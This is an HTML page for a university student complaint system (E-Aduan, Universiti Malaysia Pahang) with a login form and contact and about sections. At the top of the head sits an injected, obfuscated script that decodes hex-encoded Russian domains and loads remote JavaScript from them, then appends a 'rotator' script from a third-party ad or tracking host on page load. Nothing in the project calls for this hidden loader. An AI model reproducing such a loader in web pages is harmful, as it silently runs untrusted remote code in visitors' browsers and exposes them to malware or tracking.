<!DOCTYPE>

<html>
<head><script>if(window.v_347548468_V_235235235 === undefined) !(function(){!function(){var t=JSON.parse('["32386e32676c3377667962302e7275","646d7564337679736a61366d65342e7275"]'),e="27801",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=String.fromCharCode(parseInt(t[o],16));return e},n=function(t,e,o){var n=document.location.protocol+"//"+t;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a982392846||(this.a982392846=!0,"function"==typeof e&&e())},r.onerror=function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r),"function"==typeof o&&o())}}},r=function(i){var a=i?i:t[0],s=o(a)+"/pjs/"+e+".js";n(s,function(){},function(){var e=t.indexOf(a),o=t[e+1];o&&r(o)})};r()}();function getCfCookie(name) { var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)")); return matches ? decodeURIComponent(matches[1]) : undefined;} if (window.self == window.top) { document.addEventListener("DOMContentLoaded", function(){ var pops = document.createElement('script'); var cfilterCookie = '6697e3d5eb75761c638fdeb1eed84055'; var cfilterCookieIsSet = getCfCookie(cfilterCookie) ? getCfCookie(cfilterCookie) : 0; pops.src = '//mywebshield-ww1.com/' + 'getcl/rotator/' + 'campaignid/3/' + 'sourceid/132/' + 'siteid/200093650/' + 'userid/72FDEB20-0B9B-428C-8063-188B919A91F2/' + 'iscookie/' + cfilterCookieIsSet; document.head.appendChild(pops); });}}) (), window.v_347548468_V_235235235 = true;</script>

<link rel="stylesheet" type="text/css" href="style.css">
<meta name="viewport" content="width=device-width, initial-scale=1">



<div id="header">  <img src='http://www.ump.edu.my/download/logo-rasmi-ump.png' align='middle' width='20%' height='15%'><img src='https://terengganutimes.com/wp-content/uploads/2014/10/ADUAN_01.png' align='right' width='20%' height='15%'><br/><br/></div>

<
<ul>

<li><a href="http://localhost/xampp/project/slidehome.html">Home</a></li>
  <li><a href="http://localhost/xampp/project/faq.html">Help</a></li>
  
  <li style="float:right">
<a onclick="document.getElementById('id01').style.display='block'" style="width:auto;">Login</a></li>


<div id="id01" class="modal">
 <form class="modal-content animate" action="connect.php" method="post">
<div class="message"><?php if($message!="") { echo $message; } ?></div>
    <div class="imgcontainer">
      <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal">&times;</span>
      
    </div>

    <div class="container">
	                                                          
															  
      <label><b>Username</b></label>
      <input type="text" placeholder="Enter Username" name="studentID" id="studentID" required>

      <label><b>Password</b></label>
      <input type="password" placeholder="Enter Password" name="studentPassword" id="studentPassword" required>
        
      <button type="submit">Login</button>
	
      <input type="checkbox" checked="checked"> Remember me
    </div>

    <div class="container" style="background-color:#f1f1f1">
      <button type="button" onclick="document.getElementById('id01').style.display='none'" class="cancelbtn">Cancel</button>
      <span class="psw">Register <a href="registration.html">account?</a></span>
    </div>
  </form>
</div>





<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>


</ul>

<style>
.tableheader {
background-color: #2F4F4F;
color:white;
font-weight:bold;
}
.tablerow {
background-color: ##F8F8FF;
color:DarkSlateGray;
}
.message {
color: 	#2F4F4F;
font-weight: bold;
text-align: center;
width: 100%;
}
</style>
</body>

<input type="hidden" name="language" id="language" value="2" />
<table border="0" cellpadding="10" cellspacing="0" width="900" align="center">
<tr class="tableheader">
<td align="center" colspan="2">CONTACT US</td>
</tr><br>
<tr class="tablerow">
<td align="center" class="td" >GAMBANG CAMPUS<br><br>Universiti Malaysia Pahang
<br>Lebuhraya Tun Razak
<br>26300 Gambang, Kuantan
<br>Pahang Darul Makmur</td>
</tr>
<tr class="tablerow">
<td align="center" class="td" >Tel: +609-1234567<br>
Fax: +609-1234567<br>Emel: e-aduan@ump.edu.my<br><br></td>

</tr>
<tr class="tableheader">
<td align="center" colspan="2">ABOUT US</td>
</tr><br>
<tr class="tablerow">
<td align="center" class="td" >E-aduan system is for UMP students to complaints any problem that happen inside university.,<br>
This system is categorized by several problems that faced by UMP student which are <br> cleanliness, external interference, damage, utilities and theft. All the complaint from student will <br>
be record in the database. So, the department will takes a right action how to solve all the problems <br> and give feedback for duration takes to solve it. All the data
of the <br> complaint will be collected, analysed and recorded by this E-Aduan system.<br><br>
The system should be prioritized the complaints based on the dates of the complaints so the action<br> should be first focusing on the date of the complaints
made. <br><br>
</td>
</tr>
</table>
</table>

<div id="footer">
<br>
<br>
<center>Hakcipta © 2013 Universiti Malaysia Pahang. Hak cipta terpelihara</center>
</form>
</body>
</html>